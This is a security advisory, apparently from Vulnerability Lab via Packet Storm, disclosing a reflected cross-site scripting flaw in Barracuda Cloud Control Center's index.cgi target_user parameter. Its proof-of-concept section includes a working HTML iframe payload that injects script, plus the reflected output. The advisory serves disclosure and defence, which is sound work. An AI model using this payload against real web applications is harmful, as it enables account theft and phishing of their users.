Barracuda Cloud Control 3.020 Cross Site Scripting

2018-07-18T00:00:00
ID PACKETSTORM:148602
Type packetstorm
Reporter Benjamin Kunz Mejri
Modified 2018-07-18T00:00:00

Description

                                        
                                            `Document Title:  
===============  
Barracuda Cloud Control v3.020 - CS Cross Site Vulnerability  
  
  
References (Source):  
====================  
http://www.vulnerability-lab.com/get_content.php?id=662  
  
  
Release Date:  
=============  
2018-07-18  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
662  
  
  
Common Vulnerability Scoring System:  
====================================  
3.3  
  
  
Vulnerability Class:  
====================  
Cross Site Scripting - Non Persistent  
  
  
Current Estimated Price:  
========================  
500a! - 1.000a!  
  
  
Product & Service Introduction:  
===============================  
The Barracuda Control Center is a comprehensive cloud-based service that  
enables administrators to  
monitor and configure multiple Barracuda Networks products from a single  
console. With the  
Barracuda Control Center, you can check the health of all connected  
devices, run reports that are  
generated by gathering data from all the devices, and assign roles with  
varied permissions to different  
types of users. The powerful Web interface of the Barracuda Control  
Center provides for convenient  
configuration and management of multiple Barracuda Networks device  
settings, while also providing a view  
of each device Web interface for individual configuration or reporting.  
No need to install software or  
deploy hardware. Key statistics can be viewed by device type at a glance  
on the Status page of the Web  
interface with the ability to drill down for more detail into the  
individual Web interface for each connected device.  
  
(Copy of the Vendor Homepage:  
https://www.barracudanetworks.com/ns/downloads/Setup_Guides/Barracuda_Cloud_Control_SG_US.pdf)  
  
  
Abstract Advisory Information:  
==============================  
The Vulnerability Laboratory Research Team discovered a client-side  
Cross Site Scripting Vulnerability in the official Barracuda Networks  
Cloud Control Center v3.0.0.020 appliance web-application.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2018-07-18: Non-Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
Barracuda Networks  
Product: Cloud Control Center 3.0.0.020  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
Medium  
  
  
Authentication Type:  
====================  
No authentication (guest)  
  
  
User Interaction:  
=================  
Low User Interaction  
  
  
Disclosure Type:  
================  
Bug Bounty Program  
  
  
Technical Details & Description:  
================================  
A cross site vulnerability has been discovered in the official Barracuda  
Networks Cloud Control Center v3.0.0.020 appliance web-application.  
The cross site vulnerability allows remote attackers to inject own  
malicious script codes to client-side browser to application requests.  
  
The cross site vulnerability is located in the `target_user` parameter  
of the `Benutzer bearbeiten (Benutzerspezifische Bayessche Daten)`  
module. Remote attackers are able to inject client-side script codes to  
the index.cgi GET method request. The application does not encode  
the script code and displays the insecure message context as output.  
Thus finally results in the client-side script code execution in the  
appliance web-application. The attacker vector of the bug is client-side  
and the request method to inject is GET.  
  
The security risk of the non-persistent cross site vulnerability is  
estimated as medium with a cvss (common vulnerability scoring system)  
count of 3.3.  
Exploitation of the client-side cross site vulnerability requires no  
privileged web-application user account and low or medium user interaction.  
Successful exploitation of the vulnerability results in in account  
theft, client-side phishing, client-side external redirects to malicious  
source  
and client-side manipulation of affected or connected module context.  
  
Request Method(s):  
[+] GET  
  
Vulnerable Module(s):  
[+] Benutzer bearbeiten - Benutzerspezifische Bayessche Daten  
  
Vulnerable Parameter(s):  
[+] target_user  
  
Affected Module(s):  
[+] index.cgi  
  
  
Proof of Concept (PoC):  
=======================  
The non persistent cross site scripting vulnerability can be exploited  
by remote attackers with medium or high required user inter action.  
For security demonstration or to reproduce the vulnerability follow the  
provided information and steps below to continue.  
  
  
Standard: Example  
https://bcc.127.0.0.1:1336/cgi-mod/index.cgi?password=befc663e87db8e886c5d8afe5f73cc3e&et=1342741957&  
primary_tab=BASIC&new_secondary_tab=user_management&auth_type=Local&nodeid=13633&locale=de_DE&  
secondary_tab=edit_user&page_submitted=550a4ef30b4d0aa5d5435c2f09b3c09c&content_only=1&target_user=  
benny%40barracuda.com&tree_name=devices&tree_filter=bccadmin&user=  
benny%40barracuda.com&ispopup=1&parent_name=user_management&popup_width=800&popup_height=500  
  
  
PoC: Exploitation  
<html>  
<head><body>  
<title>Barracuda Cloud Control v3.020 - Cross Site Scripting PoC</title>  
<iframe  
src=https://bcc.127.0.0.1:1336/cgi-mod/index.cgi?password=befc663e87db8e886c5d8afe5f73cc3e&et=1342741957&  
primary_tab=BASIC&new_secondary_tab=user_management&auth_type=Local&nodeid=13633&locale=de_DE&  
secondary_tab=edit_user&page_submitted=550a4ef30b4d0aa5d5435c2f09b3c09c&content_only=1&target_user=  
1337benny%40barracuda.com"><iframe src=http://www.vulnerability-lab.com  
onload=alert("VulnerabilityLab") <  
&tree_name=devices&tree_filter=bccadmin&user=benny%40barracuda.com&ispopup=1&parent_name=  
user_management&popup_width=800&popup_height=500></iframe>  
</body></head>  
<html>  
  
  
PoC: INDEX.CGI - Mail Listing (Output) (Benutzer bearbeiten >  
Benutzerspezifische Bayessche Daten) [target_user]  
<tr class="config_module_tr" id="config_module_row_1">  
<td valign="top" width="15"> </td>  
<td valign="top" width="150">Benutzerspezifische Bayessche Daten:</td>  
<td valign="top" width="310">1337benny@barracuda.com"><[EXECUTION OF  
CLIENT SIDE SCRIPT CODE!])' <<="" td="">  
<td valign="top"> </td>  
</tr>  
  
  
Reference(s):  
https://bcc.127.0.0.1:1336/  
https://bcc.127.0.0.1:1336/cgi-mod/  
https://bcc.127.0.0.1:1336/cgi-mod/index.cgi  
  
  
Solution - Fix & Patch:  
=======================  
The vulnerability can be patched by a secure parse and encode of the  
vulnerable index.cgi file.  
Restrict the input of the vulnerable marked values and disallow the  
usage of special chars.  
Use entities and filter all inputs with an exception-handling to prevent  
client-side exploitation.  
  
  
Note: The issue was reported in 2016 Q4 to the barracuda networks  
developer team. The issue was finally resolved in 2017 Q3 - Q4.  
The disclosure process took about 8month to complete by recognizing the  
patch cycle.  
  
  
Security Risk:  
==============  
The security risk of the non-persistent cross site scripting  
vulnerability in the target_user value parameter is estimated as medium.  
  
  
Credits & Authors:  
==================  
Benjamin Kunz Mejri (Vulnerability Lab) [research@vulnerability-lab.com]  
- https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without  
any warranty. Vulnerability Lab disclaims all warranties, either  
expressed or  
implied, including the warranties of merchantability and capability for  
a particular purpose. Vulnerability-Lab or its suppliers are not liable  
in any  
case of damage, including direct, indirect, incidental, consequential  
loss of business profits or special damages, even if Vulnerability Labs  
or its  
suppliers have been advised of the possibility of such damages. Some  
states do not allow the exclusion or limitation of liability mainly for  
incidental  
or consequential damages so the foregoing limitation may not apply. We  
do not approve or encourage anybody to break any licenses, policies, deface  
websites, hack into databases or trade with stolen data. We have no need  
for criminal activities or membership requests. We do not publish  
advisories  
or vulnerabilities of religious-, militant- and racist-  
hacker/analyst/researcher groups or individuals. We do not publish trade  
researcher mails,  
phone numbers, conversations or anything else to journalists,  
investigative authorities or private individuals.  
  
Domains: www.vulnerability-lab.com - www.vulnerability-db.com -  
www.evolution-sec.com  
Programs: vulnerability-lab.com/submit.php -  
vulnerability-lab.com/list-of-bug-bounty-programs.php -  
vulnerability-lab.com/register.php  
Feeds: vulnerability-lab.com/rss/rss.php -  
vulnerability-lab.com/rss/rss_upcoming.php -  
vulnerability-lab.com/rss/rss_news.php  
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab -  
youtube.com/user/vulnerability0lab  
  
Any modified copy or reproduction, including partially usages, of this  
file, resources or information requires authorization from Vulnerability  
Laboratory.  
Permission to electronically redistribute this alert in its unmodified  
form is granted. All other rights, including the use of other media, are  
reserved by  
Vulnerability Lab Research Team or its suppliers. All pictures, texts,  
advisories, source code, videos and other information on this website is  
trademark  
of vulnerability-lab team & the specific authors or managers. To record,  
list, modify, use or edit our material contact (admin@) to get an ask  
permission.  
  
Copyright A(c) 2018 | Vulnerability Laboratory - [Evolution  
Security GmbH]aC/  
  
  
  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
`